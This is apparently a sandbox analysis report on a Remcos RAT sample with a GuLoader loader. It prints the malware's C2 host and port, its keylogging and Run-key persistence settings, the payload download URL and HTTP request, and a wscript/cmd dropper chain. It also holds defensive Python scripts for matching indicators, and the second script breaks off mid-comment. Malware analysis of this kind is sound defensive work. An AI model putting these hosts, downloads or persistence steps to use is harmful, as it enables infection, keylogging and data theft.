Windows Analysis Report mU9H96igb3.exe

Overview

General Information

Sample Name: mU9H96igb3.exe
Analysis ID: 1662
MD5: 8777020a37b6797241a489a707b9784b
SHA1: a1ed1029b967295f9ce5e9d219f41dc6c7fc4d1a
SHA256: 8a45d901cab57a1b65c32aea2452f56436dcf01c37bdf7875838e6054f395d90

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Detected Remcos RAT
GuLoader behavior detected
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect Any.run
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates an undocumented autostart registry key
Sigma detected: WScript or CScript Dropper
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "monitprradministratioran.loseyourip.com:24091:1", "Assigned name": "NetGeneration", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "Dlls.exe", "Startup value": "Chrome", "Hide file": "Enable", "Mutex": "Remcos-HCJBCA", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobes", "Keylog folder": "Adobes", "Keylog file max size": "20000"}
Source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://implantecapilarpereira.com/NetGen"}
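The extracted Remcos configuration above already contains everything needed to hunt for this build on other hosts. The following script is an added example, not part of the Joe Sandbox report: it copies the hunting-relevant fields of that configuration, derives the concrete indicators (C2 host and port, install path, keylog file, Run-key value, mutex) and checks a few telemetry records against them. The telemetry record layout (event_type plus a handful of fields), the assumption that "AppData" means the user's roaming profile folder, and the assumption that the HKCU/HKLM "Setup Run" options write under the standard Run key are made for this example; the SAMPLE_EVENTS are constructed from the observations in this report.

```python
"""Derive hunt indicators from the Remcos config in the report and match
telemetry against them (added example; not from the sandbox report)."""
import re

# Hunting-relevant fields copied from the extracted configuration above.
REMCOS_CONFIG = {
    "Host:Port:Password": "monitprradministratioran.loseyourip.com:24091:1",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
    "Install path": "AppData",
    "Copy file": "Dlls.exe",
    "Startup value": "Chrome",
    "Mutex": "Remcos-HCJBCA",
    "Keylog flag": "1",
    "Keylog path": "AppData",
    "Keylog file": "logs.dat",
    "Copy folder": "Adobes",
    "Keylog folder": "Adobes",
}

# Assumption: the "Setup ... Run" options write the startup value under the
# standard Run key of the respective hive.
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
# Assumption: "AppData" means %APPDATA% (Roaming), which is where the report
# saw Dlls.exe land. Other path labels are left as they are.
PATH_LABELS = {"AppData": "%APPDATA%"}


def parse_c2(value):
    """Split 'host:port:password' from the right so the host keeps no port."""
    host, port, password = value.rsplit(":", 2)
    return host, int(port), password


def derive_iocs(cfg):
    """Turn configuration fields into concrete host and network indicators."""
    host, port, _ = parse_c2(cfg["Host:Port:Password"])
    install_base = PATH_LABELS.get(cfg["Install path"], cfg["Install path"])
    install_exe = "\\".join([install_base, cfg["Copy folder"], cfg["Copy file"]])
    keylog_base = PATH_LABELS.get(cfg["Keylog path"], cfg["Keylog path"])
    keylog_file = "\\".join([keylog_base, cfg["Keylog folder"], cfg["Keylog file"]])
    run_values = []
    for hive, option in (("HKCU", "Setup HKCU\\Run"), ("HKLM", "Setup HKLM\\Run")):
        if cfg.get(option) == "Enable":
            run_values.append((hive + "\\" + RUN_KEY, cfg["Startup value"], install_exe))
    return {
        "c2_host": host,
        "c2_port": port,
        "mutex": cfg["Mutex"],
        "install_exe": install_exe,
        "keylog_file": keylog_file if cfg.get("Keylog flag") == "1" else None,
        "run_values": run_values,
    }


def _path_pattern(template):
    """Case-insensitive regex for a path; %APPDATA% may be any user's Roaming."""
    escaped = re.escape(template).replace(
        re.escape("%APPDATA%"), r"C:\\Users\\[^\\]+\\AppData\\Roaming")
    return re.compile("^" + escaped + "$", re.IGNORECASE)


def match_events(events, iocs):
    """Return (event index, indicator name) for every event hitting an IOC."""
    exe_re = _path_pattern(iocs["install_exe"])
    keylog_re = _path_pattern(iocs["keylog_file"]) if iocs["keylog_file"] else None
    hits = []
    for i, ev in enumerate(events):
        kind = ev["event_type"]
        if kind == "registry_set":
            for key, name, _ in iocs["run_values"]:
                if (ev["key"].lower() == key.lower()
                        and ev["name"].lower() == name.lower()
                        and exe_re.match(ev["data"].strip('"'))):
                    hits.append((i, "run_key"))
        elif kind == "mutex_create":
            # Mutants carry a session prefix; compare the leaf name only.
            if ev["name"].rsplit("\\", 1)[-1] == iocs["mutex"]:
                hits.append((i, "mutex"))
        elif kind == "file_create":
            if exe_re.match(ev["path"]) or (keylog_re and keylog_re.match(ev["path"])):
                hits.append((i, "install_or_keylog_file"))
        elif kind == "net_connect":
            if ev["dst_host"] == iocs["c2_host"] and ev["dst_port"] == iocs["c2_port"]:
                hits.append((i, "c2"))
    return hits


# Constructed telemetry modelled on the report's observations.
SAMPLE_EVENTS = [
    {"event_type": "file_create", "path": r"C:\Users\user\AppData\Roaming\Adobes\Dlls.exe"},
    {"event_type": "mutex_create", "name": r"\Sessions\1\BaseNamedObjects\Remcos-HCJBCA"},
    {"event_type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "Chrome", "data": r"C:\Users\user\AppData\Roaming\Adobes\Dlls.exe"},
    {"event_type": "net_connect", "dst_host": "monitprradministratioran.loseyourip.com", "dst_port": 24091},
    # GuLoader's stage host is not in the Remcos config, so this one must not hit.
    {"event_type": "net_connect", "dst_host": "implantecapilarpereira.com", "dst_port": 80},
    {"event_type": "file_create", "path": r"C:\Users\user\AppData\Roaming\Adobes\logs.dat"},
]
```

The install path and Run-key value are the durable artifacts here: the C2 hostname is a dynamic-DNS name and the port can change per build, whereas the Adobes\Dlls.exe path, the "Chrome" startup value and the Remcos-HCJBCA mutex are what this configuration writes to disk and to the object namespace on every infected host.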
Multi AV Scanner detection for submitted file
Source: mU9H96igb3.exe Virustotal: Detection: 32%
Source: mU9H96igb3.exe Metadefender: Detection: 25%
Source: mU9H96igb3.exe ReversingLabs: Detection: 24%
Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR
Antivirus / Scanner detection for submitted sample
Source: mU9H96igb3.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Avira: detection malicious, Label: TR/AD.Nekark.fexqx
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Metadefender: Detection: 25%
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe ReversingLabs: Detection: 24%
Antivirus or Machine Learning detection for unpacked file
Source: 21.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 16.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 19.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 16.2.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 17.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 18.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 2.0.mU9H96igb3.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 9.0.mU9H96igb3.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 15.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 20.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx

Compliance:

Uses 32bit PE files
Source: mU9H96igb3.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 8.6.8.23 ports 0,1,2,4,9,24091
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://implantecapilarpereira.com/NetGen
Source: Malware configuration extractor URLs: monitprradministratioran.loseyourip.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: MASTER-ASCzechRepublicwwwmasterczCZ
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected (4 identical requests):
GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: implantecapilarpereira.com
Cache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49809 -> 8.6.8.23:24091
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin
Source: Dlls.exe, 00000014.00000002.139080944862.00000000007B4000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binHR
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarperei
Source: Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binn
Source: mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bint
Source: mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binx
Source: unknown DNS traffic detected: queries for: implantecapilarpereira.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Adobes\Dlls.exe

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match File source: the same five memory regions and four process memory spaces (mU9H96igb3.exe PID 6380; Dlls.exe PIDs 7852, 3384, 4696) listed under AV Detection above

System Summary:

Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Uses 32bit PE files
Source: mU9H96igb3.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code functions: 2_2_02BF4B8B, 2_2_02C0474A, 2_2_02BF087E, 2_2_02BF557A, 2_2_02BE4AA2, 2_2_02C01BCE, 2_2_02BF6BF6, 2_2_02C0130A, 2_2_02BFECDD, 2_2_02BF00C6, 2_2_02BFE400, 2_2_02BF7574
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code functions: 9_2_0058474A, 9_2_0057557A, 9_2_00574B8B, 9_2_0057087E, 9_2_0057E400, 9_2_0057ECDD, 9_2_005700C6, 9_2_005800B4, 9_2_00564AA2, 9_2_00577574, 9_2_0058130A, 9_2_00581BCE, 9_2_00576BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code functions: 15_2_02C24B8B, 15_2_02C3474A, 15_2_02C2087E, 15_2_02C2557A, 15_2_02C14AA2, 15_2_02C31BCE, 15_2_02C26BF6, 15_2_02C3130A, 15_2_02C200C6, 15_2_02C2ECDD, 15_2_02C2E400, 15_2_02C27574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code functions: 17_2_04F6087E, 17_2_04F64B8B, 17_2_04F6557A, 17_2_04F7474A, 17_2_04F6ECDD, 17_2_04F600C6, 17_2_04F54AA2, 17_2_04F6E400, 17_2_04F66BF6, 17_2_04F71BCE, 17_2_04F67574, 17_2_04F7130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code functions: 18_2_0235087E, 18_2_0235557A, 18_2_0236474A, 18_2_02354B8B, 18_2_0235E400, 18_2_02344AA2, 18_2_0235ECDD, 18_2_023500C6, 18_2_0236130A, 18_2_02357574, 18_2_02356BF6, 18_2_02361BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code functions: 20_2_0058474A, 20_2_0057557A, 20_2_00574B8B, 20_2_0057087E, 20_2_0057E400, 20_2_0057ECDD, 20_2_005700C6, 20_2_005800B4, 20_2_00564AA2, 20_2_00577574, 20_2_0058130A, 20_2_00581BCE, 20_2_00576BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code functions: 21_2_0058474A, 21_2_0057557A, 21_2_00574B8B, 21_2_0057087E, 21_2_0057E400, 21_2_0057ECDD, 21_2_005700C6, 21_2_005800B4, 21_2_00564AA2, 21_2_00577574, 21_2_0058130A, 21_2_00581BCE, 21_2_00576BF6
Contains functionality to call native functions
Note: the same function offset (…474A) is attributed to NtSetInformationThread (processes 2 and 17), NtSetContextThread (process 15) and NtResumeThread (process 18), alongside NtAllocateVirtualMemory, NtWriteVirtualMemory and NtProtectVirtualMemory in neighbouring functions. That is the API set of a process-hollowing loader writing a payload into a suspended child, consistent with the "Creates a process in suspended mode" and "Hides threads from debuggers" signatures above.
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C0474A NtSetInformationThread
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C04084 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF087E NtWriteVirtualMemory
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF557A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C0130A NtWriteVirtualMemory
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF7574 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00586E0F NtProtectVirtualMemory
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00584084 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00566970 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057557A NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C3474A NtSetContextThread
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C34084 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2087E NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2557A NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C3130A NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C27574 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F74084 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6087E NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6557A NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F7474A NtSetInformationThread
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F67574 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F7130A NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235087E NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02364084 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235557A NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0236474A NtResumeThread
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0236130A NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02357574 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_0058727E Sleep, NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_00586E0F NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_00586CD1 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_00586E17 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_005873EB NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_00586CCC NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_005870C5 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00586E0F NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00584084 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00566970 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057557A NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00586E0F NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00584084 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00566970 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057557A NtAllocateVirtualMemory
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: mU9H96igb3.exe, 00000002.00000000.137179026496.0000000000431000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
Source: mU9H96igb3.exe, 00000009.00000000.137581988864.0000000000431000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
Source: mU9H96igb3.exe, 00000009.00000002.137983891314.00000000009FC000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs mU9H96igb3.exe
Source: mU9H96igb3.exe, 00000009.00000002.137983891314.00000000009FC000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs mU9H96igb3.exe
Source: mU9H96igb3.exe Binary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
PE file contains strange resources
Source: mU9H96igb3.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dlls.exe.9.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\mU9H96igb3.exe Section loaded: edgegdi.dll (reported twice)
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: edgegdi.dll (reported six times)
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90 (identical to the SHA256 of the submitted sample: Dlls.exe is a byte-for-byte self-copy, as the "Copy file": "Dlls.exe" setting in the extracted configuration specifies)
Source: C:\Users\user\Desktop\mU9H96igb3.exe File read: C:\Users\user\Desktop\mU9H96igb3.exe
Source: mU9H96igb3.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\mU9H96igb3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\mU9H96igb3.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll (Visual Basic 6 runtime)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll (reported three times)
Source: unknown Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe File created: C:\Users\user\AppData\Roaming\Adobes Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe File created: C:\Users\user\AppData\Local\Temp\install.vbs Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@19/4@2/2
Source: C:\Users\user\Desktop\mU9H96igb3.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:304:WilStaging_02
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-HCJBCA
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: Window Recorder Window detected: More than 3 window changes detected
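The process-creation lines above describe the full delivery chain: the sample re-launches itself, writes install.vbs to the user's Temp directory, runs it with WScript, and the script uses cmd.exe to start the dropped Dlls.exe from AppData\Roaming, which then spawns copies of itself. The following Python is an added example (not Joe Sandbox code and not part of the report) that parses such "Process created" lines into parent/child edges and flags exactly that pattern, in the spirit of the two Sigma rules the report names ("WScript or CScript Dropper", "Suspicious Script Execution From Temp Folder"). The sample input is constructed from the report's own lines; the directory lists and the one-hop-through-cmd.exe allowance are assumptions to tune per environment.

```python
import re
from collections import defaultdict

# Constructed sample: "Process created" lines copied from this report.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe' Jump to behavior",
    r"Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' Jump to behavior",
    r"Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' Jump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r"Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' Jump to behavior",
    r"Source: unknown Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'",
]

# The child path is taken up to the first space, which holds for every path in this report;
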